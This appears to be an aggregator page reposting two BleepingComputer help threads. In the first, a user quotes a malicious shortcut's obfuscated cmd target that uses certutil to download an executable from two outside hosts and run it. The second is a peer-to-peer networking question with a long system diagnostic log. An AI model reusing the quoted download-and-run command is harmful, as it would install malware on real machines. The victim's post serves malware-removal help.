Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Problems connecting Win10 laptop to Hiren's BootCD desktop - Networking - BleepingComputer

Problems connecting Win10 laptop to Hiren's BootCD desktop - Networking - BleepingComputer


Problems connecting Win10 laptop to Hiren's BootCD desktop - Networking - BleepingComputer

Posted: 26 Feb 2020 12:00 AM PST

Laptop: HP Pavilion G6-2158sa running Win10 Home 32bit v 1909.

Desktop: Booted from Hiren's BootCD PE Windows 10, with PE Network Manager 0.59.B4.

Connection: Peer to peer over ethernet.

Cable length: Less than 2 metres.

No router involved.

No internet involved.

I'm trying to create a peer to peer ethernet network between a laptop running Win 10 and a desktop booted from Hiren's BootCD PE from flash drive or DVD but I cannot get it to work and I can't find any simple tutorials to help other than for WinXP.

Although I have been trying using Hiren's, I guess any WIN PE USB/DVD or similar would do, just as long as I can access the hard drive on the desktop from the laptop.

Anyone able to help or point me towards a tutorial?

MiniToolBox results below.

MiniToolBox by Farbar  Version: 17-06-2016
Ran by Martyn (administrator) on 26-02-2020 at 17:59:36
Running from "C:\Users\marty\Downloads"
Microsoft Windows 10 Home  (X86)
Model: HP Pavilion g6 Notebook PC Manufacturer: Hewlett-Packard
Boot Mode: Normal
***************************************************************************
========================= Flush DNS: ===================================
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
========================= IE Proxy Settings: ============================== 
Proxy is not enabled.
No Proxy Server is set.
"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================
========================= IP Configuration: ================================
Realtek PCIe FE Family Controller = Ethernet (Connected)
Ralink RT5390R 802.11b/g/n 1x1 Wi-Fi Adapter = WiFi (Media disconnected)
802.11n USB Wireless LAN Card = WiFi ext (Media disconnected)
# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4
set global icmpredirects=enabled
set interface interface="Bluetooth Network Connection" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection 4" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet (Kernel Debugger)" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Mobile 3" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Mobile 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Mobile" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet 3" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 1" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
# End of IPv4 configuration
Windows IP Configuration
   Host Name . . . . . . . . . . . . : KAA-HP-Lappy
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : home
Wireless LAN adapter WiFi:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Ralink RT5390R 802.11b/g/n 1x1 Wi-Fi Adapter
   Physical Address. . . . . . . . . : 84-4B-F5-48-7A-10
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 11:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #3
   Physical Address. . . . . . . . . : 78-D3-8D-09-55-05
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 12:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #4
   Physical Address. . . . . . . . . : 78-D3-8D-09-55-06
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . : home
   Description . . . . . . . . . . . : Realtek PCIe FE Family Controller
   Physical Address. . . . . . . . . : 28-92-4A-44-C7-71
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e90a:b3a3:fa81:254e%21(Preferred) 
   Autoconfiguration IPv4 Address. . : 169.254.37.78(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 455643722
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-7A-98-4C-28-92-4A-44-C7-71
   DNS Servers . . . . . . . . . . . : 192.168.1.254
   NetBIOS over Tcpip. . . . . . . . : Enabled
Wireless LAN adapter WiFi ext:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : 802.11n USB Wireless LAN Card
   Physical Address. . . . . . . . . : 78-D3-8D-09-55-03
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.1.254
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
Ping request could not find host google.com. Please check the name and try again.
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.1.254
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
Ping request could not find host yahoo.com. Please check the name and try again.
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
  6...84 4b f5 48 7a 10 ......Ralink RT5390R 802.11b/g/n 1x1 Wi-Fi Adapter
 16...78 d3 8d 09 55 05 ......Microsoft Wi-Fi Direct Virtual Adapter #3
 24...78 d3 8d 09 55 06 ......Microsoft Wi-Fi Direct Virtual Adapter #4
 21...28 92 4a 44 c7 71 ......Realtek PCIe FE Family Controller
  8...78 d3 8d 09 55 03 ......802.11n USB Wireless LAN Card
  1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
      169.254.0.0      255.255.0.0         On-link     169.254.37.78    291
    169.254.37.78  255.255.255.255         On-link     169.254.37.78    291
  169.254.255.255  255.255.255.255         On-link     169.254.37.78    291
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link     169.254.37.78    291
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link     169.254.37.78    291
===========================================================================
Persistent Routes:
IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    331 ::1/128                  On-link
 21    291 fe80::/64                On-link
 21    291 fe80::e90a:b3a3:fa81:254e/128
                                    On-link
  1    331 ff00::/8                 On-link
 21    291 ff00::/8                 On-link
===========================================================================
Persistent Routes:
========================= Winsock entries =====================================
Catalog5 01 C:\WINDOWS\system32\napinsp.dll [54784] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\system32\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\system32\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 04 C:\WINDOWS\system32\wshbth.dll [50688] (Microsoft Corporation)
Catalog5 05 C:\WINDOWS\system32\NLAapi.dll [70144] (Microsoft Corporation)
Catalog5 06 C:\WINDOWS\system32\winrnr.dll [23552] (Microsoft Corporation)
Catalog5 07 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 01 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 12 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 13 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
Catalog9 14 C:\WINDOWS\system32\mswsock.dll [346552] (Microsoft Corporation)
========================= Event log errors: ===============================
Application errors:
==================
Error: (02/26/2020 02:38:06 PM) (Source: SecurityCenter) (User: )
Description: Error while updating  status to SECURITY_PRODUCT_STATE_ON.
Error: (02/25/2020 06:49:04 PM) (Source: Application Error) (User: )
Description: Faulting application name: SystemSettingsBroker.exe, version: 10.0.18362.1, time stamp: 0x7e3613aa
Faulting module name: ntdll.dll, version: 10.0.18362.657, time stamp: 0xf0246c60
Exception code: 0xc0000005
Fault offset: 0x00052626
Faulting process ID: 0x1c90
Faulting application start time: 0xSystemSettingsBroker.exe0
Faulting application path: SystemSettingsBroker.exe1
Faulting module path: SystemSettingsBroker.exe2
Report ID: SystemSettingsBroker.exe3
Faulting package full name: SystemSettingsBroker.exe4
Faulting package-relative application ID: SystemSettingsBroker.exe5
Error: (02/24/2020 12:39:10 PM) (Source: Microsoft-Windows-CAPI2) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
Error: (02/19/2020 12:49:31 PM) (Source: Application Hang) (User: )
Description: The program AiOHomeCenter.exe version 8.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: fac
Start Time: 01d5e72181af6b6d
Termination Time: 4294967295
Application Path: C:\Program Files\Kodak\AiO\Center\AiOHomeCenter.exe
Report Id: 83605e15-d93b-4835-b08d-63c2595fb8da
Faulting package full name: 
Faulting package-relative application ID: 
Hang type: AiOHomeCenter.exe0
Error: (02/19/2020 11:38:19 AM) (Source: Microsoft-Windows-PerfNet) (User: KAA-HP-LAPPY)
Description: Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Error: (02/19/2020 10:53:54 AM) (Source: VSS) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007045b, A system shutdown is in progress.
Error: (02/19/2020 10:53:54 AM) (Source: VSS) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and name CEventSystem cannot be started. [0x8007045b, A system shutdown is in progress.
Error: (02/19/2020 10:53:54 AM) (Source: VSS) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007045b, A system shutdown is in progress.
Error: (02/19/2020 10:53:54 AM) (Source: VSS) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and name CEventSystem cannot be started. [0x8007045b, A system shutdown is in progress.
Error: (02/19/2020 06:28:07 AM) (Source: MsiInstaller) (User: NT AUTHORITY)
Description: Product: SQL Server 2014 Database Engine Services - Update '{91944D5C-7F1D-4E24-A28F-6CA4A8C0D1E7}' could not be installed. Error code 1642. Additional information is available in the log file C:\WINDOWS\TEMP\MSI256bc.LOG.
System errors:
=============
Error: (02/26/2020 03:12:22 PM) (Source: Service Control Manager) (User: )
Description: The MTSchedulerService service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.
Error: (02/26/2020 03:12:21 PM) (Source: Service Control Manager) (User: )
Description: The MTAgentService service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.
Error: (02/26/2020 02:53:16 PM) (Source: Schannel) (User: NT AUTHORITY)
Description: The certificate received from the remote server does not contain the expected name. It is therefore not possible to determine whether we are connecting to the correct server. The server name we were expecting is s-iavs9x.avcdn.net. The TLS connection request has failed. The attached data contains the server certificate.
Error: (02/26/2020 02:42:09 PM) (Source: Service Control Manager) (User: )
Description: The MessagingService_c93bb service terminated with the following error: 
%%21 = The device is not ready.
Error: (02/26/2020 02:35:34 PM) (Source: Ntfs) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume \\?\Volume{6444ec56-0000-0000-0000-c077ae000000}.
The Master File Table (MFT) contains a corrupted file record.  The file reference number is 0x100000000001c.  The name of the file is "<unable to determine file name>".
Error: (02/26/2020 02:35:34 PM) (Source: Microsoft-Windows-Ntfs) (User: NT AUTHORITY)
Description: \\?\Volume{6444ec56-0000-0000-0000-c077ae000000}\Device\HarddiskVolume43
Error: (02/26/2020 02:35:24 PM) (Source: Ntfs) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume \\?\Volume{6444ec56-0000-0000-0000-100000000000}.
The exact nature of the corruption is unknown.  The file system structures need to be scanned and fixed offline.
Error: (02/26/2020 02:35:24 PM) (Source: Ntfs) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume \\?\Volume{6444ec56-0000-0000-0000-100000000000}.
The Master File Table (MFT) contains a corrupted file record.  The file reference number is 0x20000000000a8.  The name of the file is "<unable to determine file name>".
Error: (02/26/2020 02:35:24 PM) (Source: Microsoft-Windows-Ntfs) (User: NT AUTHORITY)
Description: \\?\Volume{6444ec56-0000-0000-0000-100000000000}\Device\HarddiskVolume13
Error: (02/26/2020 02:35:05 PM) (Source: Ntfs) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume D:.
The exact nature of the corruption is unknown.  The file system structures need to be scanned and fixed offline.
Microsoft Office Sessions:
=========================
CodeIntegrity Errors:
===================================
  Date: 2020-02-26 17:55:44.950
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\aswhook.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:55:44.945
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\snxhk.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:54:59.946
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\aswhook.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:54:59.928
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\snxhk.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:54:23.104
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\aswhook.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:54:23.098
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\snxhk.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:53:41.379
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\aswhook.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:53:41.358
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\snxhk.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:48:24.630
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\aswhook.dll that did not meet the Microsoft signing level requirements.
  Date: 2020-02-26 17:48:24.622
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\AVAST Software\Avast\snxhk.dll that did not meet the Microsoft signing level requirements.
=========================== Installed Programs ============================
ACCU-CHEK 360 (HKLM\...\{33C351FC-D928-47F8-8184-D8B47F303678}) (Version: 1.0.14 - Roche) Hidden
ACCU-CHEK 360 Connection Manager (HKLM\...\InstallShield_{33C351FC-D928-47F8-8184-D8B47F303678}) (Version: 1.0.14 - Roche)
ACCU-CHEK 360° (HKLM\...\{C05A5601-DC01-4348-AB02-CD334E8DEFE4}) (Version: 2.2.3 - Roche Diabetes Care) Hidden
ACCU-CHEK 360° (HKLM\...\InstallShield_{C05A5601-DC01-4348-AB02-CD334E8DEFE4}) (Version: 2.2.3 - Roche Diabetes Care)
Adobe Acrobat Reader DC (HKLM\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 20.006.20034 - Adobe Systems Incorporated)
Adobe Refresh Manager (HKLM\...\{AC76BA86-0804-1033-1959-000182435289}) (Version: 1.8.0 - Adobe Systems Incorporated) Hidden
aioprnt (HKLM\...\{0645A454-AD44-4F0D-99CF-6B762735AD1F}) (Version: 5.3.1.0 - Eastman Kodak Company) Hidden
aioscnnr (HKLM\...\{376348C2-E372-48BC-A138-E896757BD86A}) (Version: 5.8.10.0 - Your Company Name) Hidden
aioscnnr (HKLM\...\{EF53BFAB-4C10-40DB-A82D-9B07111715C6}) (Version: 7.6.13.10 - Your Company Name) Hidden
Avast Driver Updater (HKLM\...\{630C3D8E-2BEE-465F-9E59-BB069ED10761}) (Version: 2.5.6 - AVAST Software) Hidden
Avast Driver Updater (HKLM\...\Avast Driver Updater) (Version: 2.5.6 - AVAST Software)
Avast Free Antivirus (HKLM\...\Avast Antivirus) (Version: 20.1.2397 - AVAST Software)
Belarc Advisor 8.6b (HKLM\...\Belarc Advisor) (Version: 8.6.2.0 - Belarc Inc.)
Borland Data Engine (HKLM\...\{3AF6EF15-5841-4FF8-A3FC-5B2400AB9145}) (Version: 5.2.0 - Roche Diagnostics)
CCleaner (HKLM\...\CCleaner) (Version: 5.59 - Piriform)
center (HKLM\...\{56BA241F-580C-43D2-8403-947241AAE633}) (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
CutePDF Writer 3.2 (HKLM\...\CutePDF Writer Installation) (Version:  3.2 - Acro Software Inc.)
essentials (HKLM\...\{BE94C681-68E2-4561-8ABC-8D2E799168B4}) (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
Flash Drive Tester v1.14 (HKLM\...\{272C8DEE-F54F-406C-9AA6-B4DE2985A47C}) (Version: 1.14 - Virtual Console)
GDR 4237 for SQL Server 2014 (KB4019091) (HKLM\...\KB4019091) (Version: 12.1.4237.0 - Microsoft Corporation)
Google Chrome (HKLM\...\Google Chrome) (Version: 80.0.3987.122 - Google LLC)
Google Earth Pro (HKLM\...\{9D524A1E-F2FC-444D-B12A-7592CEB56EB5}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
GSmartControl (HKLM\...\GSmartControl) (Version: 1.1.3 - Alexander Shaduri)
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP Battery Recall Utility (HKLM\...\{f3599c4b-0d80-49d2-90ad-009e456f31d6}) (Version: 1.2.3.2 - HP Inc.)
HP CASL Framework (HKLM\...\{5094249B-9542-4536-AE76-B769EE085C99}) (Version: 7.0.5.1 - HP)
HP PC Hardware Diagnostics Windows (HKLM\...\{CCA94394-0200-4066-A397-C826702B09C6}) (Version: 1.5.9.0 - HP Inc.)
HP Support Assistant (HKLM\...\{F322B446-B157-4257-B44F-4F22D41F8EDB}) (Version: 8.6.18.11 - HP Inc.)
HP Support Solutions Framework (HKLM\...\{20907839-6188-46EF-8AE7-141C86EDE13F}) (Version: 12.9.24.3 - HP Inc.)
Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.5069 - Intel Corporation)
Intel® Driver & Support Assistant (HKLM\...\{db2b22b1-e3a5-41f6-8761-26638d7a7003}) (Version: 20.1.5.6 - Intel)
Kodak AIO Printer (HKLM\...\{27EF8E7F-88D1-4ec5-ADE2-7E447FDF114E}) (Version: 7.8.1.0 - Eastman Kodak Company) Hidden
KODAK AiO Software (HKLM\...\{E0F274B7-592B-4669-8FB8-8D9825A09858}) (Version: 8.0.0.0 - Eastman Kodak Company)
Macrium Reflect Free Edition (HKLM\...\{ABE1DE3A-C844-442A-BCDF-52476FABD2B6}) (Version: 7.2.4601 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 7.2 - Paramount Software (UK) Ltd.)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft ODBC Driver 11 for SQL Server (HKLM\...\{15F74689-5EF2-4B5E-BD68-6FCBDD8B1698}) (Version: 12.1.4237.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 19.232.1124.0005 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{8F72E2D4-1E48-4534-8DB8-1E8E012899C6}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{83C7F964-AC58-4104-B613-B4D0F61DA8CD}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 (HKLM\...\Microsoft SQL Server SQLServer2014) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM\...\{11EA04C6-8E40-4D43-BDD0-2DF9464EDDBA}) (Version: 12.1.4100.1 - Microsoft Corporation)
Microsoft SQL Server 2014 Setup (English) (HKLM\...\{D8BECB50-B81E-4B38-8264-CFE01DBE4FC9}) (Version: 12.1.4237.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{0E0E306C-FC8B-4B41-A52F-976CF1A2ED0B}) (Version: 12.1.4100.1 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{71BBE068-233F-403C-88B8-C2FDE753F6B0}) (Version: 12.1.4100.1 - Microsoft Corporation)
Microsoft Visio Professional 2002 [English] (HKLM\...\{90510409-6D54-11D4-BEE3-00C04F990354}) (Version: 10.2.5110 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2014 (HKLM\...\{59C8A9FB-D230-4718-B4D8-9671D823526F}) (Version: 12.1.4100.1 - Microsoft Corporation)
MiniTool ShadowMaker (32-bit) (HKLM\...\MT-75D7C412-925B-4AD0-90DC-5E4FEE22EAE1_is1) (Version: 3.2 - MiniTool)
ocr (HKLM\...\{BFBCF96F-7361-486A-965C-54B17AC35421}) (Version: 6.2.3.50 - Eastman Kodak Company) Hidden
Panda USB Vaccine 1.0.1.16 (HKLM\...\{55A41219-9B22-4098-BAE7-AE289B3C569A}_is1) (Version:  - Panda Security)
PreReq (HKLM\...\{DA5BDB2A-12F0-4343-8351-21AAEB293990}) (Version: 6.2.4.0 - Eastman Kodak Company) Hidden
PrintProjects (HKLM\...\PrintProjects) (Version: 1.0.0.9282 - RocketLife Inc.)
Realtek Ethernet Controller Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.28.615.2018 - Realtek)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
RMPrepUSB (HKLM\...\RMPrepUSB) (Version:  - )
SeaTools for Windows 1.4.0.6 (HKLM\...\SeaTools for Windows) (Version: 1.4.0.6 - Seagate Technology)
Service Pack 1 for SQL Server 2014 (KB3058865) (HKLM\...\KB3058865) (Version: 12.1.4100.1 - Microsoft Corporation)
Speccy (HKLM\...\Speccy) (Version: 1.32 - Piriform)
SQL Server 2014 Common Files (HKLM\...\{BFB3B874-8033-4F5E-BE47-0AED2541E57C}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM\...\{F78A23CD-E9A0-46E3-88E2-CF2CC93AE7BA}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM\...\{71E418D7-C0C5-455A-A248-1A3C3839EEEF}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM\...\{A1ED7C85-A91A-4788-B0CC-86FA19C042E8}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM\...\{1D1E4532-6A52-471B-B006-EA04A2BBFCE9}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM\...\{AA2D8197-6678-4242-9222-3A03993E89B3}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2014 (HKLM\...\{3204DE95-97D2-4261-A286-98A262E171D4}) (Version: 12.1.4100.1 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{894F30EB-3F0A-422F-9225-EB00DC9414EA}) (Version: 12.1.4100.1 - Microsoft Corporation) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 8.0.1040 - SUPERAntiSpyware.com)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
